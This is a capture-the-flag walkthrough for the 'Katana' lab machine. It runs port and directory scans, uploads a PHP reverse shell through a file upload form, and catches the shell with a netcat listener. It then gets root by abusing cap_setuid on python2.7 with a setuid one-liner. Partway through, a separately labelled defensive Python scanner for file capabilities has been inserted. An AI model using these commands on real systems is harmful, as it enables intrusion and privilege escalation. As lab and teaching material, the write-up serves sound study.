Exploitation Guide for Katana


This machine is compromised through a file upload vulnerability in a web application. Privileges are then escalated by abusing a misconfigured Linux file capability on the python2.7 binary.



We start off by running an nmap scan:

kali@kali:~$ sudo nmap -p-
Starting Nmap 7.80 ( ) at 2020-08-20 11:33 EDT
Nmap scan report for
Host is up (0.030s latency).
Not shown: 65527 closed ports
21/tcp   open  ftp
22/tcp   open  ssh
80/tcp   open  http
3389/tcp open  ms-wbt-server
7080/tcp open  empowerid
8088/tcp open  radan-http
8715/tcp open  unknown
9198/tcp open  unknown


Using dirb and the default wordlist, we are able to brute-force and discover upload.html on port 8088:

kali@kali:~$ dirb -X .html -r

DIRB v2.22    
By The Dark Raver

START_TIME: Thu Aug 20 14:05:14 2020
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive
EXTENSIONS_LIST: (.html) | (.html) [NUM = 1]


GENERATED WORDS: 4612                                                          

---- Scanning URL: ----
+ (CODE:200|SIZE:195)                                                
+ (CODE:200|SIZE:655)                                                   
+ (CODE:200|SIZE:6480)                                                 
END_TIME: Thu Aug 20 14:07:40 2020


File Upload Vulnerability

Navigating to, we see a couple of file upload controls. We are able to upload the PHP reverse shell available at /usr/share/webshells/php/php-reverse-shell.php:

kali@kali:~$ locate php-reverse-shell.php

Set the local port to 4444 in the PHP reverse shell. We can choose either control for our upload. After selecting the prepared PHP reverse shell, click Submit Query. The following message appears:

Please wait for 1 minute!. Please relax!.

File : file1
Name :
Type :
Path :
Size : 0
Please wait for 1 minute!. Please relax!.

file is empty, not stored.

File : file2
Name : php-reverse-shell.php
Type : application/x-php
Path : /tmp/phpFjoLWh
Size : 5495
Please wait for 1 minute!. Please relax!.

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php
MD5 : 8783aa0d056e9e74e9d9856605d072a5
Size : 5495 bytes

The important part is this:

Moved to other web server: /tmp/phpFjoLWh ====> /opt/manager/html/katana_php-reverse-shell.php

First, start a netcat listener on port 4444. From the nmap scan, we saw an open port 8715. Using some guesswork and the "Moved to other web server" message above, we can trigger the reverse shell by navigating to

kali@kali:~$ nc -lvp 4444
listening on [any] 4444 ... inverse host lookup failed: Unknown host
connect to [] from (UNKNOWN) [] 57806
Linux katana 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2 (2020-04-29) x86_64 GNU/Linux
 13:36:02 up 1 min,  0 users,  load average: 0.03, 0.02, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c 'import pty; pty.spawn("/bin/bash")'


Checking File Capabilities

Using getcap with the recursive flag from the root directory, we see that the cap_setuid file capability with the +ep flags is set on python2.7:

www-data@katana:~$ getcap -r / 2>/dev/null
getcap -r / 2>/dev/null
/usr/bin/ping = cap_net_raw+ep
/usr/bin/python2.7 = cap_setuid+ep

Linux file capabilities are maintained by the kernel and are similar in spirit to SUID: the kernel's thread privilege checks are based on capabilities, which split the actions normally reserved for root into smaller, separately grantable units, so a binary can be given one of them instead of full root. The file capability sets are stored in an extended attribute named security.capability.
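To show what that extended attribute actually holds, and how a defender would find a misconfiguration like this one before an attacker does, here is an added example (not part of the original walkthrough) that decodes the raw security.capability value and audits a filesystem for binaries whose permitted set includes root-equivalent bits. The constants come from the kernel's uapi/linux/capability.h; the watch-list of "root-equivalent" capabilities and the sample blobs are this example's own assumptions.

```python
import os
import struct

# security.capability layout, from the kernel's uapi/linux/capability.h
VFS_CAP_REVISION_MASK = 0xFF000000
VFS_CAP_REVISION_2 = 0x02000000     # 20 bytes: magic_etc + two (permitted, inheritable) u32 pairs
VFS_CAP_REVISION_3 = 0x03000000     # 24 bytes: revision-2 layout + rootid (user-namespace caps)
VFS_CAP_FLAGS_EFFECTIVE = 0x000001  # the "e" of "+ep": permitted bits become effective on exec

# Capability bit numbers from the same header. The watch-list is this example's own
# assumption: bits that make a general-purpose binary such as an interpreter effectively root.
CAP_NAMES = {1: "cap_dac_override", 6: "cap_setgid", 7: "cap_setuid",
             13: "cap_net_raw", 19: "cap_sys_ptrace", 21: "cap_sys_admin"}
ROOT_EQUIVALENT = {1, 6, 7, 19, 21}

def decode_security_capability(blob: bytes) -> dict:
    """Parse a raw security.capability value into 64-bit permitted/inheritable masks."""
    if len(blob) < 4:
        raise ValueError("security.capability value too short")
    magic_etc = struct.unpack_from("<I", blob, 0)[0]
    revision = magic_etc & VFS_CAP_REVISION_MASK
    expected = {VFS_CAP_REVISION_2: 20, VFS_CAP_REVISION_3: 24}.get(revision)
    if expected is None or len(blob) != expected:
        raise ValueError("unsupported revision %#x or length %d" % (revision, len(blob)))
    # little-endian (permitted, inheritable) for bits 0-31, then the same pair for bits 32-63
    p_lo, i_lo, p_hi, i_hi = struct.unpack_from("<IIII", blob, 4)
    return {"permitted": p_lo | (p_hi << 32), "inheritable": i_lo | (i_hi << 32),
            "effective": bool(magic_etc & VFS_CAP_FLAGS_EFFECTIVE)}

def risky_caps(caps: dict) -> list:
    """Watch-listed capability names present in the permitted set, in bit order."""
    return [CAP_NAMES[b] for b in sorted(ROOT_EQUIVALENT) if caps["permitted"] & (1 << b)]

def scan_tree(root: str = "/") -> list:
    """Walk a filesystem (Linux only) and list files whose xattr grants a risky capability."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                blob = os.getxattr(path, "security.capability", follow_symlinks=False)
                names = risky_caps(decode_security_capability(blob))
            except (OSError, ValueError):
                continue  # no xattr, unreadable, or malformed: nothing to report here
            if names:
                findings.append((path, names))
    return findings

# Constructed samples: the on-disk form of the two getcap lines shown in the walkthrough
SAMPLE_PYTHON27 = struct.pack("<IIIII", VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE, 1 << 7, 0, 0, 0)
SAMPLE_PING = struct.pack("<IIIII", VFS_CAP_REVISION_2 | VFS_CAP_FLAGS_EFFECTIVE, 1 << 13, 0, 0, 0)
```

Running `scan_tree("/")` on the target would report /usr/bin/python2.7 with cap_setuid while leaving ping's cap_net_raw alone; the fix is `setcap -r /usr/bin/python2.7`, since an interpreter never legitimately needs to change its own UID.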

We are able to abuse the capabilities misconfiguration of python2.7 to drop ourselves into a root shell:

www-data@katana:~$ whoami
www-data@katana:~$ /usr/bin/python2.7 -c 'import os; os.setuid(0); os.system("/bin/bash")'
<c 'import os; os.setuid(0); os.system("/bin/bash")'
root@katana:~# whoami


Unattended way: brute-force SSH, and find katana /root
